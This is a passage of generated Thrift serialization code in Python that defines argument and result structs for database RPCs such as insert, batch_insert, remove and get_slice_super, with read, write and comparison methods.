            fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
            return
        iprot.readStructBegin()
        while True:
            (fname, ftype, fid) = iprot.readFieldBegin()
            if ftype == TType.STOP:
                break
            if fid == 0:
                if ftype == TType.STRUCT:
                    self.success = column_t()
                    self.success.read(iprot)
                else:
                    iprot.skip(ftype)
            else:
                iprot.skip(ftype)
            iprot.readFieldEnd()
        iprot.readStructEnd()
    def write(self, oprot):
        # C-accelerated fast path when a spec is available.
        if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
            oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
            return
        oprot.writeStructBegin('get_column_result')
        if self.success is not None:
            oprot.writeFieldBegin('success', TType.STRUCT, 0)
            self.success.write(oprot)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()
    def __str__(self):
        return str(self.__dict__)
    def __repr__(self):
        return repr(self.__dict__)
    def __eq__(self, other):
        return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
    def __ne__(self, other):
        return not (self == other)
class get_column_count_args:
    """Argument struct for the ``get_column_count`` RPC.

    Fields use negative Thrift ids (legacy implicit numbering); all three
    are strings defaulting to None and skipped on the wire when unset.
    Idiom fixes vs. the generated code: ``is (not) None`` instead of
    ``!= None`` and no trailing semicolons — wire behavior is unchanged.
    """
    thrift_spec = None
    def __init__(self, d=None):
        self.tablename = None
        self.key = None
        self.columnFamily_column = None
        # Optional dict initializer, as emitted by the Thrift generator.
        if isinstance(d, dict):
            if 'tablename' in d:
                self.tablename = d['tablename']
            if 'key' in d:
                self.key = d['key']
            if 'columnFamily_column' in d:
                self.columnFamily_column = d['columnFamily_column']
    def read(self, iprot):
        # C-accelerated fast path when the transport and spec allow it.
        if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
            fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
            return
        iprot.readStructBegin()
        while True:
            (fname, ftype, fid) = iprot.readFieldBegin()
            if ftype == TType.STOP:
                break
            if fid == -1:
                if ftype == TType.STRING:
                    self.tablename = iprot.readString()
                else:
                    iprot.skip(ftype)
            elif fid == -2:
                if ftype == TType.STRING:
                    self.key = iprot.readString()
                else:
                    iprot.skip(ftype)
            elif fid == -3:
                if ftype == TType.STRING:
                    self.columnFamily_column = iprot.readString()
                else:
                    iprot.skip(ftype)
            else:
                iprot.skip(ftype)
            iprot.readFieldEnd()
        iprot.readStructEnd()
    def write(self, oprot):
        # C-accelerated fast path when a spec is available.
        if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
            oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
            return
        oprot.writeStructBegin('get_column_count_args')
        if self.tablename is not None:
            oprot.writeFieldBegin('tablename', TType.STRING, -1)
            oprot.writeString(self.tablename)
            oprot.writeFieldEnd()
        if self.key is not None:
            oprot.writeFieldBegin('key', TType.STRING, -2)
            oprot.writeString(self.key)
            oprot.writeFieldEnd()
        if self.columnFamily_column is not None:
            oprot.writeFieldBegin('columnFamily_column', TType.STRING, -3)
            oprot.writeString(self.columnFamily_column)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()
    def __str__(self):
        return str(self.__dict__)
    def __repr__(self):
        return repr(self.__dict__)
    def __eq__(self, other):
        return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
    def __ne__(self, other):
        return not (self == other)
class get_column_count_result:
  """Thrift result struct for the get_column_count RPC; success is an i32 count."""
  thrift_spec = (
    (0, TType.I32, 'success', None, None, ), # 0
  )
  def __init__(self, d=None):
    # Optionally seed the success field from a dict keyed by field name.
    self.success = None
    if isinstance(d, dict):
      if 'success' in d:
        self.success = d['success']
  def read(self, iprot):
    """Deserialize this struct from iprot, skipping unrecognized fields."""
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 0:
        if ftype == TType.I32:
          self.success = iprot.readI32()
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to oprot; unset (None) fields are omitted."""
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('get_column_count_result')
    if self.success is not None:
      oprot.writeFieldBegin('success', TType.I32, 0)
      oprot.writeI32(self.success)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def __str__(self):
    return str(self.__dict__)
  def __repr__(self):
    return repr(self.__dict__)
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class insert_blocking_args:
  """Thrift argument struct for the insert_blocking RPC.

  Fields use negative ids, so no thrift_spec tuple exists and the
  accelerated (fastbinary) path is never taken for this struct.
  """
  thrift_spec = None
  def __init__(self, d=None):
    # Fields may be seeded from an optional dict keyed by field name.
    self.tablename = None
    self.key = None
    self.columnFamily_column = None
    self.cellData = None
    self.timestamp = None
    if isinstance(d, dict):
      if 'tablename' in d:
        self.tablename = d['tablename']
      if 'key' in d:
        self.key = d['key']
      if 'columnFamily_column' in d:
        self.columnFamily_column = d['columnFamily_column']
      if 'cellData' in d:
        self.cellData = d['cellData']
      if 'timestamp' in d:
        self.timestamp = d['timestamp']
  def read(self, iprot):
    """Deserialize this struct from iprot, skipping unrecognized fields."""
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == -1:
        if ftype == TType.STRING:
          self.tablename = iprot.readString()
        else:
          iprot.skip(ftype)
      elif fid == -2:
        if ftype == TType.STRING:
          self.key = iprot.readString()
        else:
          iprot.skip(ftype)
      elif fid == -3:
        if ftype == TType.STRING:
          self.columnFamily_column = iprot.readString()
        else:
          iprot.skip(ftype)
      elif fid == -4:
        if ftype == TType.STRING:
          self.cellData = iprot.readString()
        else:
          iprot.skip(ftype)
      elif fid == -5:
        if ftype == TType.I32:
          self.timestamp = iprot.readI32()
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to oprot; unset (None) fields are omitted."""
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('insert_blocking_args')
    if self.tablename is not None:
      oprot.writeFieldBegin('tablename', TType.STRING, -1)
      oprot.writeString(self.tablename)
      oprot.writeFieldEnd()
    if self.key is not None:
      oprot.writeFieldBegin('key', TType.STRING, -2)
      oprot.writeString(self.key)
      oprot.writeFieldEnd()
    if self.columnFamily_column is not None:
      oprot.writeFieldBegin('columnFamily_column', TType.STRING, -3)
      oprot.writeString(self.columnFamily_column)
      oprot.writeFieldEnd()
    if self.cellData is not None:
      oprot.writeFieldBegin('cellData', TType.STRING, -4)
      oprot.writeString(self.cellData)
      oprot.writeFieldEnd()
    if self.timestamp is not None:
      oprot.writeFieldBegin('timestamp', TType.I32, -5)
      oprot.writeI32(self.timestamp)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def __str__(self):
    return str(self.__dict__)
  def __repr__(self):
    return repr(self.__dict__)
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class insert_blocking_result:
  """Fieldless Thrift result struct acknowledging the insert_blocking RPC."""
  thrift_spec = (
  )
  def __init__(self, d=None):
    # No fields to initialize; the optional dict argument is ignored.
    pass
  def read(self, iprot):
    """Consume a (fieldless) struct from iprot, skipping any fields present."""
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      _name, field_type, field_id = iprot.readFieldBegin()
      if field_type == TType.STOP:
        break
      iprot.skip(field_type)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Emit an empty struct to oprot."""
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('insert_blocking_result')
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def __str__(self):
    return str(self.__dict__)
  def __repr__(self):
    return repr(self.__dict__)
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class insert_args:
  """Thrift argument struct for the insert RPC.

  Fields use negative ids, so no thrift_spec tuple exists and the
  accelerated (fastbinary) path is never taken for this struct.
  """
  thrift_spec = None
  def __init__(self, d=None):
    # Fields may be seeded from an optional dict keyed by field name.
    self.tablename = None
    self.key = None
    self.columnFamily_column = None
    self.cellData = None
    self.timestamp = None
    if isinstance(d, dict):
      if 'tablename' in d:
        self.tablename = d['tablename']
      if 'key' in d:
        self.key = d['key']
      if 'columnFamily_column' in d:
        self.columnFamily_column = d['columnFamily_column']
      if 'cellData' in d:
        self.cellData = d['cellData']
      if 'timestamp' in d:
        self.timestamp = d['timestamp']
  def read(self, iprot):
    """Deserialize this struct from iprot, skipping unrecognized fields."""
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == -1:
        if ftype == TType.STRING:
          self.tablename = iprot.readString()
        else:
          iprot.skip(ftype)
      elif fid == -2:
        if ftype == TType.STRING:
          self.key = iprot.readString()
        else:
          iprot.skip(ftype)
      elif fid == -3:
        if ftype == TType.STRING:
          self.columnFamily_column = iprot.readString()
        else:
          iprot.skip(ftype)
      elif fid == -4:
        if ftype == TType.STRING:
          self.cellData = iprot.readString()
        else:
          iprot.skip(ftype)
      elif fid == -5:
        if ftype == TType.I32:
          self.timestamp = iprot.readI32()
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to oprot; unset (None) fields are omitted."""
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('insert_args')
    if self.tablename is not None:
      oprot.writeFieldBegin('tablename', TType.STRING, -1)
      oprot.writeString(self.tablename)
      oprot.writeFieldEnd()
    if self.key is not None:
      oprot.writeFieldBegin('key', TType.STRING, -2)
      oprot.writeString(self.key)
      oprot.writeFieldEnd()
    if self.columnFamily_column is not None:
      oprot.writeFieldBegin('columnFamily_column', TType.STRING, -3)
      oprot.writeString(self.columnFamily_column)
      oprot.writeFieldEnd()
    if self.cellData is not None:
      oprot.writeFieldBegin('cellData', TType.STRING, -4)
      oprot.writeString(self.cellData)
      oprot.writeFieldEnd()
    if self.timestamp is not None:
      oprot.writeFieldBegin('timestamp', TType.I32, -5)
      oprot.writeI32(self.timestamp)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def __str__(self):
    return str(self.__dict__)
  def __repr__(self):
    return repr(self.__dict__)
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class insert_result:
  """Fieldless Thrift result struct acknowledging the insert RPC."""
  thrift_spec = (
  )
  def __init__(self, d=None):
    # No fields to initialize; the optional dict argument is ignored.
    pass
  def read(self, iprot):
    """Consume a (fieldless) struct from iprot, skipping any fields present."""
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      _name, field_type, field_id = iprot.readFieldBegin()
      if field_type == TType.STOP:
        break
      iprot.skip(field_type)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Emit an empty struct to oprot."""
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('insert_result')
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def __str__(self):
    return str(self.__dict__)
  def __repr__(self):
    return repr(self.__dict__)
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class batch_insert_args:
  """Thrift argument struct for the batch_insert RPC; wraps one batch_mutation_t.

  The single field uses a negative id, so no thrift_spec tuple exists and
  the accelerated (fastbinary) path is never taken for this struct.
  """
  thrift_spec = None
  def __init__(self, d=None):
    # The field may be seeded from an optional dict keyed by field name.
    self.batchMutation = None
    if isinstance(d, dict):
      if 'batchMutation' in d:
        self.batchMutation = d['batchMutation']
  def read(self, iprot):
    """Deserialize this struct from iprot, skipping unrecognized fields."""
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == -1:
        if ftype == TType.STRUCT:
          self.batchMutation = batch_mutation_t()
          self.batchMutation.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to oprot; unset (None) fields are omitted."""
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('batch_insert_args')
    if self.batchMutation is not None:
      oprot.writeFieldBegin('batchMutation', TType.STRUCT, -1)
      self.batchMutation.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def __str__(self):
    return str(self.__dict__)
  def __repr__(self):
    return repr(self.__dict__)
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class batch_insert_result:
  """Fieldless Thrift result struct acknowledging the batch_insert RPC."""
  thrift_spec = (
  )
  def __init__(self, d=None):
    # No fields to initialize; the optional dict argument is ignored.
    pass
  def read(self, iprot):
    """Consume a (fieldless) struct from iprot, skipping any fields present."""
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      _name, field_type, field_id = iprot.readFieldBegin()
      if field_type == TType.STOP:
        break
      iprot.skip(field_type)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Emit an empty struct to oprot."""
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('batch_insert_result')
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def __str__(self):
    return str(self.__dict__)
  def __repr__(self):
    return repr(self.__dict__)
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class batch_insert_blocking_args:
  """Thrift argument struct for the batch_insert_blocking RPC; wraps one batch_mutation_t.

  The single field uses a negative id, so no thrift_spec tuple exists and
  the accelerated (fastbinary) path is never taken for this struct.
  """
  thrift_spec = None
  def __init__(self, d=None):
    # The field may be seeded from an optional dict keyed by field name.
    self.batchMutation = None
    if isinstance(d, dict):
      if 'batchMutation' in d:
        self.batchMutation = d['batchMutation']
  def read(self, iprot):
    """Deserialize this struct from iprot, skipping unrecognized fields."""
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == -1:
        if ftype == TType.STRUCT:
          self.batchMutation = batch_mutation_t()
          self.batchMutation.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to oprot; unset (None) fields are omitted."""
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('batch_insert_blocking_args')
    if self.batchMutation is not None:
      oprot.writeFieldBegin('batchMutation', TType.STRUCT, -1)
      self.batchMutation.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def __str__(self):
    return str(self.__dict__)
  def __repr__(self):
    return repr(self.__dict__)
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class batch_insert_blocking_result:
  """Thrift result struct for the batch_insert_blocking RPC; success is a bool."""
  thrift_spec = (
    (0, TType.BOOL, 'success', None, None, ), # 0
  )
  def __init__(self, d=None):
    # Optionally seed the success field from a dict keyed by field name.
    self.success = None
    if isinstance(d, dict):
      if 'success' in d:
        self.success = d['success']
  def read(self, iprot):
    """Deserialize this struct from iprot, skipping unrecognized fields."""
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 0:
        if ftype == TType.BOOL:
          self.success = iprot.readBool()
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to oprot; unset (None) fields are omitted."""
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('batch_insert_blocking_result')
    if self.success is not None:
      oprot.writeFieldBegin('success', TType.BOOL, 0)
      oprot.writeBool(self.success)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def __str__(self):
    return str(self.__dict__)
  def __repr__(self):
    return repr(self.__dict__)
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class remove_args:
  """Thrift argument struct for the remove RPC.

  Fields use negative ids, so no thrift_spec tuple exists and the
  accelerated (fastbinary) path is never taken for this struct.
  """
  thrift_spec = None
  def __init__(self, d=None):
    # Fields may be seeded from an optional dict keyed by field name.
    self.tablename = None
    self.key = None
    self.columnFamily_column = None
    if isinstance(d, dict):
      if 'tablename' in d:
        self.tablename = d['tablename']
      if 'key' in d:
        self.key = d['key']
      if 'columnFamily_column' in d:
        self.columnFamily_column = d['columnFamily_column']
  def read(self, iprot):
    """Deserialize this struct from iprot, skipping unrecognized fields."""
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == -1:
        if ftype == TType.STRING:
          self.tablename = iprot.readString()
        else:
          iprot.skip(ftype)
      elif fid == -2:
        if ftype == TType.STRING:
          self.key = iprot.readString()
        else:
          iprot.skip(ftype)
      elif fid == -3:
        if ftype == TType.STRING:
          self.columnFamily_column = iprot.readString()
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to oprot; unset (None) fields are omitted."""
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('remove_args')
    if self.tablename is not None:
      oprot.writeFieldBegin('tablename', TType.STRING, -1)
      oprot.writeString(self.tablename)
      oprot.writeFieldEnd()
    if self.key is not None:
      oprot.writeFieldBegin('key', TType.STRING, -2)
      oprot.writeString(self.key)
      oprot.writeFieldEnd()
    if self.columnFamily_column is not None:
      oprot.writeFieldBegin('columnFamily_column', TType.STRING, -3)
      oprot.writeString(self.columnFamily_column)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def __str__(self):
    return str(self.__dict__)
  def __repr__(self):
    return repr(self.__dict__)
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class remove_result:
  """Fieldless Thrift result struct acknowledging the remove RPC."""
  thrift_spec = (
  )
  def __init__(self, d=None):
    # No fields to initialize; the optional dict argument is ignored.
    pass
  def read(self, iprot):
    """Consume a (fieldless) struct from iprot, skipping any fields present."""
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      _name, field_type, field_id = iprot.readFieldBegin()
      if field_type == TType.STOP:
        break
      iprot.skip(field_type)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Emit an empty struct to oprot."""
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('remove_result')
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def __str__(self):
    return str(self.__dict__)
  def __repr__(self):
    return repr(self.__dict__)
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class get_slice_super_args:
  """Thrift argument struct for the get_slice_super RPC.

  start and count default to -1 (not None), so they are normally always
  serialized by write(). Fields use negative ids, so no thrift_spec tuple
  exists and the accelerated (fastbinary) path is never taken.
  """
  thrift_spec = None
  def __init__(self, d=None):
    # Fields may be seeded from an optional dict keyed by field name.
    self.tablename = None
    self.key = None
    self.columnFamily_superColumnName = None
    self.start = -1
    self.count = -1
    if isinstance(d, dict):
      if 'tablename' in d:
        self.tablename = d['tablename']
      if 'key' in d:
        self.key = d['key']
      if 'columnFamily_superColumnName' in d:
        self.columnFamily_superColumnName = d['columnFamily_superColumnName']
      if 'start' in d:
        self.start = d['start']
      if 'count' in d:
        self.count = d['count']
  def read(self, iprot):
    """Deserialize this struct from iprot, skipping unrecognized fields."""
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == -1:
        if ftype == TType.STRING:
          self.tablename = iprot.readString()
        else:
          iprot.skip(ftype)
      elif fid == -2:
        if ftype == TType.STRING:
          self.key = iprot.readString()
        else:
          iprot.skip(ftype)
      elif fid == -3:
        if ftype == TType.STRING:
          self.columnFamily_superColumnName = iprot.readString()
        else:
          iprot.skip(ftype)
      elif fid == -4:
        if ftype == TType.I32:
          self.start = iprot.readI32()
        else:
          iprot.skip(ftype)
      elif fid == -5:
        if ftype == TType.I32:
          self.count = iprot.readI32()
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to oprot; unset (None) fields are omitted."""
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('get_slice_super_args')
    if self.tablename is not None:
      oprot.writeFieldBegin('tablename', TType.STRING, -1)
      oprot.writeString(self.tablename)
      oprot.writeFieldEnd()
    if self.key is not None:
      oprot.writeFieldBegin('key', TType.STRING, -2)
      oprot.writeString(self.key)
      oprot.writeFieldEnd()
    if self.columnFamily_superColumnName is not None:
      oprot.writeFieldBegin('columnFamily_superColumnName', TType.STRING, -3)
      oprot.writeString(self.columnFamily_superColumnName)
      oprot.writeFieldEnd()
    if self.start is not None:
      oprot.writeFieldBegin('start', TType.I32, -4)
      oprot.writeI32(self.start)
      oprot.writeFieldEnd()
    if self.count is not None:
      oprot.writeFieldBegin('count', TType.I32, -5)
      oprot.writeI32(self.count)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def __str__(self):
    return str(self.__dict__)
  def __repr__(self):
    return repr(self.__dict__)
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class get_slice_super_result:
  """Thrift result struct for get_slice_super; success is a list of superColumn_t."""
  thrift_spec = (
    (0, TType.LIST, 'success', (TType.STRUCT,(superColumn_t, superColumn_t.thrift_spec)), None, ), # 0
  )
  def __init__(self, d=None):
    # Optionally seed the success field from a dict keyed by field name.
    self.success = None
    if isinstance(d, dict):
      if 'success' in d:
        self.success = d['success']
  def read(self, iprot):
    """Deserialize this struct from iprot, skipping unrecognized fields."""
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 0:
        if ftype == TType.LIST:
          # Element count comes from the wire; each element is a nested struct.
          self.success = []
          (_etype49, _size46) = iprot.readListBegin()
          for _i50 in xrange(_size46):
            _elem51 = superColumn_t()
            _elem51.read(iprot)
            self.success.append(_elem51)
          iprot.readListEnd()
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to oprot; unset (None) fields are omitted."""
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('get_slice_super_result')
    if self.success is not None:
      oprot.writeFieldBegin('success', TType.LIST, 0)
      oprot.writeListBegin(TType.STRUCT, len(self.success))
      for iter52 in self.success:
        iter52.write(oprot)
      oprot.writeListEnd()
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def __str__(self):
    return str(self.__dict__)
  def __repr__(self):
    return repr(self.__dict__)
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class get_superColumn_args:
  """Thrift argument struct for the get_superColumn RPC.

  Fields use negative ids, so no thrift_spec tuple exists and the
  accelerated (fastbinary) path is never taken for this struct.
  """
  thrift_spec = None
